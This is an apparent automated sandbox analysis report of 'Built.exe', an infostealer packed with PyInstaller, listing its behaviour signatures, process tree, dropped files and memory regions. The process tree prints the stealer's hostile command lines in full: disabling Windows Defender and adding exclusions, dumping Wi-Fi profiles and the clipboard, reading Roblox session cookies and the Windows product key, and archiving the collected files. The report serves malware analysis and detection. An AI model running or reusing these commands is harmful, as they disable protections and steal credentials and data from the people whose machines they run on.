Analysis

  • max time kernel
    127s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-fr
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240611-fr, locale:fr-fr, os:windows10-2004-x64, system, windows
  • submitted
    26-06-2024 13:10

General

  • Target

    Built.exe

  • Size

    224.0MB

  • MD5

    f3c0061c28b07f1ccada3dca9755b304

  • SHA1

    dd41b3edb8abf9a0147695b7dd7f285f8d5aef1e

  • SHA256

    77e67941a20d70449b0a5ba735a279f1d81429d9ea08181591cf910f69b04b71

  • SHA512

    1e804d2a9e5cac5c65ee93b0c30f36916f928e8e17aa339e5db7778725bcc42ba4318f28d30eca15bc8671eea6289602e92ccd9a45b6f4f86f8d05b9e56a5707

  • SSDEEP

    196608:HJq+sxft1urErvI9pWjgU1DEzx7sKLus1tPAkjUWlRHK0:0Xxft1urEUWjhEhnx1tl9K0

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2844
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2440
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3352
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3436
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4176
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1248
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2940
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2904
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4860
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:2888
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3856
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:1288
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2084
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:5060
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3616
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:4664
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‍.scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4348
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\    ‍.scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4188
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3004
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:844
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4196
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:1868
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64 payload removed]"
            3⤵
              PID:3924
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64 payload removed]
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:444
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v54d5zlo\v54d5zlo.cmdline"
                  5⤵
                    PID:1856
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES55C1.tmp" "c:\Users\Admin\AppData\Local\Temp\v54d5zlo\CSCBDB55F8A6D445A0862CCE2F3F1F32A.TMP"
                      6⤵
                        PID:3904
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                  3⤵
                    PID:3584
                    • C:\Windows\System32\Wbem\WMIC.exe
                      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                      4⤵
                        PID:3712
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:4064
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:3252
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "systeminfo"
                          3⤵
                            PID:3760
                            • C:\Windows\system32\systeminfo.exe
                              systeminfo
                              4⤵
                              • Gathers system information
                              PID:3148
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1932
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show profile
                              4⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:932
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:2580
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:5048
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:3336
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    PID:3304
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                  3⤵
                                    PID:4852
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-Clipboard
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1944
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4416
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:1368
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1036
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:5064
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                          3⤵
                                            PID:1768
                                            • C:\Windows\system32\attrib.exe
                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                              4⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:3436
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:620
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:788
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                3⤵
                                                  PID:1920
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FO LIST
                                                    4⤵
                                                    • Enumerates processes with tasklist
                                                    PID:3516
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:2396
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:4024
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:5052
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:4064
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:1712
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:1212
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                              3⤵
                                                                PID:3432
                                                                • C:\Windows\system32\getmac.exe
                                                                  getmac
                                                                  4⤵
                                                                    PID:4940
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                  3⤵
                                                                    PID:3904
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:2420
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    3⤵
                                                                      PID:3844
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        4⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4432
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\iy0Fp.zip" *"
                                                                      3⤵
                                                                        PID:4764
                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\iy0Fp.zip" *
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:4232
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                        3⤵
                                                                          PID:2140
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic os get Caption
                                                                            4⤵
                                                                              PID:1868
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                            3⤵
                                                                              PID:1032
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic computersystem get totalphysicalmemory
                                                                                4⤵
                                                                                  PID:2928
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                3⤵
                                                                                  PID:4684
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    4⤵
                                                                                      PID:3516
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic csproduct get uuid
                                                                                      4⤵
                                                                                        PID:4368
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                      3⤵
                                                                                        PID:3668
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                          4⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:4484
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                        3⤵
                                                                                          PID:1212
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic path win32_VideoController get name
                                                                                            4⤵
                                                                                            • Detects videocard installed
                                                                                            PID:3036
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                          3⤵
                                                                                            PID:2400
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                              4⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:1092
                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                        1⤵
                                                                                          PID:1764

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Downloads

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                          Filesize

                                                                                          2KB

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          944B

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          944B

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\RES55C1.tmp

                                                                                          Filesize

                                                                                          1KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\VCRUNTIME140.dll

                                                                                          Filesize

                                                                                          116KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\_bz2.pyd

                                                                                          Filesize

                                                                                          48KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\_ctypes.pyd

                                                                                          Filesize

                                                                                          59KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\_decimal.pyd

                                                                                          Filesize

                                                                                          105KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\_hashlib.pyd

                                                                                          Filesize

                                                                                          35KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\_lzma.pyd

                                                                                          Filesize

                                                                                          86KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\_queue.pyd

                                                                                          Filesize

                                                                                          26KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\_socket.pyd

                                                                                          Filesize

                                                                                          44KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\_sqlite3.pyd

                                                                                          Filesize

                                                                                          57KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\_ssl.pyd

                                                                                          Filesize

                                                                                          65KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\base_library.zip

                                                                                          Filesize

                                                                                          1.3MB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\blank.aes

                                                                                          Filesize

                                                                                          110KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\libcrypto-3.dll

                                                                                          Filesize

                                                                                          1.6MB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\libffi-8.dll

                                                                                          Filesize

                                                                                          29KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\libssl-3.dll

                                                                                          Filesize

                                                                                          222KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\python312.dll

                                                                                          Filesize

                                                                                          1.8MB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\rar.exe

                                                                                          Filesize

                                                                                          615KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\rarreg.key

                                                                                          Filesize

                                                                                          467B

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\select.pyd

                                                                                          Filesize

                                                                                          25KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\sqlite3.dll

                                                                                          Filesize

                                                                                          630KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28442\unicodedata.pyd

                                                                                          Filesize

                                                                                          295KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5zgmqzll.hfy.ps1

                                                                                          Filesize

                                                                                          60B

                                                                                        • C:\Users\Admin\AppData\Local\Temp\v54d5zlo\v54d5zlo.dll

                                                                                          Filesize

                                                                                          4KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Desktop\EnableUnblock.jpg

                                                                                          Filesize

                                                                                          307KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Desktop\StepUnprotect.mp3

                                                                                          Filesize

                                                                                          532KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Documents\Are.docx

                                                                                          Filesize

                                                                                          11KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Documents\CloseTest.csv

                                                                                          Filesize

                                                                                          1.0MB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Documents\CompareTest.pdf

                                                                                          Filesize

                                                                                          1.0MB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Documents\CompressSubmit.txt

                                                                                          Filesize

                                                                                          658KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Documents\Files.docx

                                                                                          Filesize

                                                                                          11KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Documents\Opened.docx

                                                                                          Filesize

                                                                                          11KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Documents\Recently.docx

                                                                                          Filesize

                                                                                          11KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Documents\These.docx

                                                                                          Filesize

                                                                                          11KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Downloads\BackupWatch.gif

                                                                                          Filesize

                                                                                          204KB

                                                                                        • C:\Users\Admin\AppData\Local\Temp\     ‏  ‍ \Common Files\Downloads\CompleteGrant.docx

                                                                                          Filesize

                                                                                          321KB

                                                                                        • C:\Windows\System32\drivers\etc\hosts

                                                                                          Filesize

                                                                                          2KB

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\v54d5zlo\CSCBDB55F8A6D445A0862CCE2F3F1F32A.TMP

                                                                                          Filesize

                                                                                          652B

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\v54d5zlo\v54d5zlo.0.cs

                                                                                          Filesize

                                                                                          1004B

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\v54d5zlo\v54d5zlo.cmdline

                                                                                          Filesize

                                                                                          607B


                                                                                          5.2MB

                                                                                        • memory/2440-72-0x0000016835250000-0x0000016835779000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2440-71-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2440-67-0x00007FFFF70A0000-0x00007FFFF70D3000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2440-68-0x00007FFFEAF10000-0x00007FFFEAFDD000-memory.dmp

                                                                                          Filesize

                                                                                          820KB

                                                                                        • memory/2440-64-0x00007FF8009A0000-0x00007FF8009AD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2440-62-0x00007FFFFA870000-0x00007FFFFA889000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-60-0x00007FFFEB350000-0x00007FFFEB4C6000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2440-58-0x00007FFFFAF10000-0x00007FFFFAF34000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2440-56-0x00007FFFFAF40000-0x00007FFFFAF59000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-54-0x00007FFFFB2B0000-0x00007FFFFB2DD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/2440-76-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2440-30-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2440-25-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2440-299-0x00007FFFFAF40000-0x00007FFFFAF59000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-320-0x00007FFFFAF10000-0x00007FFFFAF34000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2440-77-0x00007FFFFA850000-0x00007FFFFA864000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/2440-336-0x00007FFFEB350000-0x00007FFFEB4C6000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2440-331-0x00007FFFEAF10000-0x00007FFFEAFDD000-memory.dmp

                                                                                          Filesize

                                                                                          820KB

                                                                                        • memory/2440-330-0x00007FFFF70A0000-0x00007FFFF70D3000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2440-322-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2440-332-0x00007FFFEA9E0000-0x00007FFFEAF09000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2440-337-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp

                                                                                          Filesize

                                                                                          6.8MB

                                                                                        • memory/2440-352-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp

                                                                                          Filesize

                                                                                          148KB

                                                                                        • memory/2440-365-0x00007FFFEA8C0000-0x00007FFFEA9DB000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/2440-364-0x00007FF800550000-0x00007FF80055D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2440-363-0x00007FFFFA850000-0x00007FFFFA864000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/2440-362-0x00007FFFEA9E0000-0x00007FFFEAF09000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/2440-361-0x00007FFFEAF10000-0x00007FFFEAFDD000-memory.dmp

                                                                                          Filesize

                                                                                          820KB

                                                                                        • memory/2440-360-0x00007FFFF70A0000-0x00007FFFF70D3000-memory.dmp

                                                                                          Filesize

                                                                                          204KB

                                                                                        • memory/2440-359-0x00007FF8009A0000-0x00007FF8009AD000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/2440-358-0x00007FFFFA870000-0x00007FFFFA889000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-357-0x00007FFFEB350000-0x00007FFFEB4C6000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/2440-356-0x00007FFFFAF10000-0x00007FFFFAF34000-memory.dmp

                                                                                          Filesize

                                                                                          144KB

                                                                                        • memory/2440-355-0x00007FFFFAF40000-0x00007FFFFAF59000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/2440-354-0x00007FFFFB2B0000-0x00007FFFFB2DD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/2440-353-0x00007FF802480000-0x00007FF80248F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB